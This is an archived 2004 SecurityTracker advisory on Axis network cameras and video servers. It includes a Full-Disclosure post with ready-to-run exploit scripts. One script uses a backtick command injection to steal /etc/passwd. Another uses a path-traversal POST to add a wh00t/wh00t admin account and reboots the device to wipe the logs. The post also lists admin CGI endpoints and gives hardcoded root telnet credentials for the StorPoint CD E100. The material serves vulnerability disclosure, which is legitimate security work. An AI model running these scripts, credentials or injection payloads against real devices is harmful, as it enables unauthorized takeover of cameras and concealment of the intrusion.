SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Device (Multimedia)  >  Axis Network Camera Vendors:  Axis Communications
Axis Network Cameras Let Remote Users View and Edit Files on the Device
SecurityTracker Alert ID:  1011056
SecurityTracker URL:  http://securitytracker.com/id?1011056
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 25 2004
Impact:  Disclosure of system information, Modification of system information, Root access via network, User access via network
Exploit Included:  Yes  
Version(s): Firmware Version 2.40; Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server
Description:  Several vulnerabilities were reported in Axis network cameras. A remote user can view and edit files and obtain administrative access on the target system.

bashis reported that the 'virtualinput.cgi' script does not properly validate user-supplied data. A remote user can supply a specially crafted request to obtain files from the target system. A demonstration exploit request is provided:

/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/ httpd/html/passwd\x60 HTTP/1.1

It is also reported that a remote user can submit a specially crafted POST request and then invoke 'editcgi.cgi' to edit the '/etc/passwd' file to add an administrative account.

A demonstration POST request is provided:

POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250
Pragma: no-cache

conf_Security_List=root%%3AADVO%%30t&checkAdmin=on&checkDial=on&ch eckView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables

It is also reported that a remote user can view parameters with the following type of URLs:

http://[target]/cgi-bin/admin/getparam.cgi
http://[target]/cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle

A remote user can also set a parameter using the following type of URL:

http://[target]/cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%20stuff

The following scripts provide additional information:

/cgi-bin/admin/systemlog.cgi (show syslog)
/cgi-bin/admin/serverreport.cgi (use[full|less] reports)
/cgi-bin/admin/restart.cgi (restart device, also good to clear syslog)
/cgi-bin/admin/paramlist.cgi (get some config)
/cgi-bin/admin/getparam.cgi (shown above)
/cgi-bin/admin/setparam.cgi (shown above)
/cgi-bin/admin/factorydefault.cgi (hrmm.. ;)
/admin-bin/editcgi.cgi?file= (browse filesystem, edit any file)

It is also reported that on the AXIS StorPoint CD E100, a remote user can telnet to the device and use a standard username and password combination ("copyright", "mammalambalouie") to gain root access on the target system.

The vendor was reportedly notified on August 16, 2004 without response.
Impact:  A remote user can view and edit files on the target system. This can be exploited to add administrative accounts.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.axis.com/products/video/camera/index.htm (Links to External Site)
Cause:  Access control error, Authentication error, Input validation error
Reported By:  bashis <mcw@wcd.se>
Message History:   None.

 Source Message Contents
Date:  Sun, 22 Aug 2004 13:17:11 +0200 (CEST)
From:  bashis <mcw@wcd.se>
Subject:  [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers

 


/* Public disclosure due lack of responce from Axis Communications */

I have found a couple of bugs in Axis Network Camera/Video Servers.
(I have all Axis stuff in one e-mail, instead of multiple, lazy me.. ;)

Vulnerable: Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server.
(There may be more devices vulnerable)

Included files (some is simple shell scripts):
axis-passwd.sh ........... Get /etc/passwd as 'anonymous viewer' v2.34/2.40
axis-wh00t.sh ............ Add admin account as 'anonymous viewer' v2.12-2.40 (whoops!)
axis-cgi.txt ............. [bonus] Not so mutch bugs here, but nice to know ;)
axis-storpoint-cd-E100.txt [bonus] Hardcoded l/p in Storepoint CD servers

Check each section for more details.

Quote of the day: Never say "whoops!", always say "Ah, Interesting!"

Vendor,
Contacted:
>To: security@axis.com
>Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)

Status: No responce what so ever.
Fix/Workaround: None, v2.40 is the latest known version.
Url: http://www.axis.com/

Greets to people in #hack.se @EFnet.

Have a nice day
/bashis

----[ axis-passwd.sh ]----

#!/bin/sh
 
# Get /etc/passwd from:
# Axis 2100/2110/2120/2420 Network Camera 2.34/2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
 
# Problem:
#  PARAMETER=`echo $QUERY_STRING | sed 's/\(^.*\)=.*$/\1/'`
# in 'virtualinput.cgi'
 
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
 
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
 
if [ ${#*} -ne 2 ]
 then
  printf "\nUsage: %s <ip> <port>\n\n" $0
  exit 1
fi
 
printf "+++ Sending request to %s:%d\n+++ Received:\n" $1 $2
printf "GET /axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/pa
sswd\x60 HTTP/1.1\n\n" | nc $1 $2
printf "+++ Yeah, right.. for you maybe, but not for me ;->\n\n+++ Get the passwd file now\n+
++ Received:\n"
printf "GET /local/passwd HTTP/1.0\n\n" | nc $1 $2
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

----[ axis-wh00t.sh ]----

#!/bin/sh
 
# Add admin account with l/p: wh00t/wh00t
# Axis 2100/2110/2120/2420 Network Camera 2.12-2.40
# AXIS 2130 PTZ Network Camera
# AXIS 2400/2401 Video Server
# (There may be more devices vulnerable)
 
# Problem:
#  POST action follows "/../"
 
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08
# Greets: #hack.se @EFnet
 
# 2.12 seems to very buggy version, it add wh00t account,
# but editcgi.cgi seems not to work..
 
# Yes, you can use 'editcgi.cgi' to edit /etc/passwd
# and change/add what you want, or browse around in filesystem.
 
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
 
if [ ${#*} -ne 2 ]
 then
  printf "\nUsage: %s <ip> <port>\n\n" $0
  exit 1
fi
 
printf "+++ Sending request to %s:%d\n" $1 $2
printf "+++ If all went well, you should see the password file soon...\n+++ Received:\n\n"
printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250\
nPragma: no-cache\n\nconf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&us
ers=wh00t&username=wh00t&password1=wh00t&password2=wh0
0t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec
_users.shtml&servermanager_do=set_variables\n"
 | nc $1 $2 > /dev/null
# Note.......^^^^^^^^^^^^^^^^^^^^^^
 
printf "GET /admin-bin/editcgi.cgi?file=/etc/passwd  HTTP/1.0\nHost: 127.0.0.1\nAuthorization: B
asic d2gwMHQ6d2gwMHQ=\n\n" | nc $1
 $2
# it's good to clear logfile, so let us reboot the device now
printf "GET /cgi-bin/admin/restart.cgi HTTP/1.0\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n"
 | nc $1 $2 > /dev/null
printf "\n\n+++ You can edit file(s) and browse around filesystem with:\nhttp://$1/admin-bin/edi
tcgi.cgi?file=\n"
printf "+++ Login with wh00t/wh00t (yes, you can edit /etc/passwd)\n"
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

----[ axis-cgi.txt ]----

# Well, not so mutch bugs here, but nice to know.. ;)
 
# From version: 2.12 and newer.
# (All dosn't work with 2.12)
 

List all availible parameters.
> http://<device>/cgi-bin/admin/getparam.cgi
or
> http://<device>/cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle

Set one parameter.
> http://<device>/cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%20stuff

# Note, Axis is changing 'cgi-bin' to 'axis-cgi'
 
/cgi-bin/admin/systemlog.cgi      (show syslog)
/cgi-bin/admin/serverreport.cgi   (use[full|less] reports)
/cgi-bin/admin/restart.cgi        (restart device, also good to clear syslog)
/cgi-bin/admin/paramlist.cgi      (get some config)
/cgi-bin/admin/getparam.cgi       (shown above)
/cgi-bin/admin/setparam.cgi       (shown above)
/cgi-bin/admin/factorydefault.cgi (hrmm.. ;)
/admin-bin/editcgi.cgi?file=      (browse filesystem, edit any file)

----[ axis-storpoint-cd-E100.txt ]----

# Yeah, old product.. old version.. but.. hardcoded l/p, uhm?
# l: copyright p: mammalambalouie
 
# Note, this hardcoded l/p exist in other products and newer versions
# of software as well, but i have not done so mutch research about this.

$ telnet xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.

AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

AXIS StorPoint CD E100 network login: copyright
Password: mammalambalouie

AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

Root> 
Root> q
Goodbye!
Connection closed by foreign host.
$ 
----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC